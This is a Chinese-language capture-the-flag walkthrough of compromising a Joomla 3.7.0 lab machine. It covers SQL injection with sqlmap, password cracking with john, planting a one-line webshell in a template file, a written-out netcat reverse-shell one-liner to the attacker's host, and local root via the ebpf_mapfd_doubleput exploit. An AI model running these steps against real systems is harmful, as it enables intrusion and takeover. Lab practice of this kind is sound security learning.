flag
nmap开路,拿到靶机的IP如下:
再进行端口扫描,结果如下:
可以看到有80端口,打开浏览器访问80端口。根据网站内容说只有一个flag,要拿root才行。第一反应就是webshell然后提权。通过指纹识别可以知道CMS是joomla(其实有经验的话看网站标题上面的图标就知道是joolma),而kali自带一个叫joomlascan,命令:joomscan --url 链接,扫描可知版本为3.7.0,登录后台为url/administrator。用msf搜索可利用漏洞。searchsploit joomla 3.7.0
看第一个,是注入漏洞。
接下来就是查看42033.txt这个文件,需要找到其完整路径,命令:searchsploit -p php/webapps/42033.txt(-p表示显示完整路径)
可以看到其完整路径,然后就可以查看它,至于查看方法随你。
它告诉了我们注入点以及注入方法,sqlmap的使用就不多说了,注意的是最后字段的时候不要用--batch,每一步都选y就行了,如下是数据库数据。我们需要拿到的是username和password数据。
结果是加密的,这里引入一个叫john的工具,它是一个解密工具,kali自带,直接拿来用就行了。在用之前先将密文存储到一个txt文件中去,然后john 文件.txt,然后john --show 文件.txt查看结果。
密码为snoopy(史努比),就可以拿它登录后台了。到这一步要最做的就是随便点点,看看有没有上传漏洞点,经过一番折腾,找到了一个可写入后门的点,就在路径localhost/templates/beez3/html下。把modules.php内容改为一句话木马,然后用蚁剑连接(也可以新建一个文件)。
然后在虚拟终端里查询系统信息,uname -a,cat /etc/issue
是Ubuntu 16.04,再搜索对应的漏洞如下,为什么使用这个呢,其实是一个个试出来的,最后发现这个可以用。。。
然后搞一个反弹shell先。
- kali终端输入
nc -nvlp
- 蚁剑虚拟终端输入
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.137 4444 >/tmp/f
注意上面的ip是你kali的ip,因为上面我监听的是4444端口,所以要输入4444端口,之后kali端成功获取反弹shell。然后再回到漏洞版本那里,查看对应文档,里面写的有使用方法。
然后把压缩包下载下来用蚁剑上传。在靶机里解压,之后进入到解压目录,再用命令tar -xvf 目标.tar对exploit.tar进行解压。进入新生成的目录ebpf_mapfd_doubleput_exploit,依次执行
./compile.sh
./doubleput
成功提权,回到root文件夹。发现有flag,直接查看
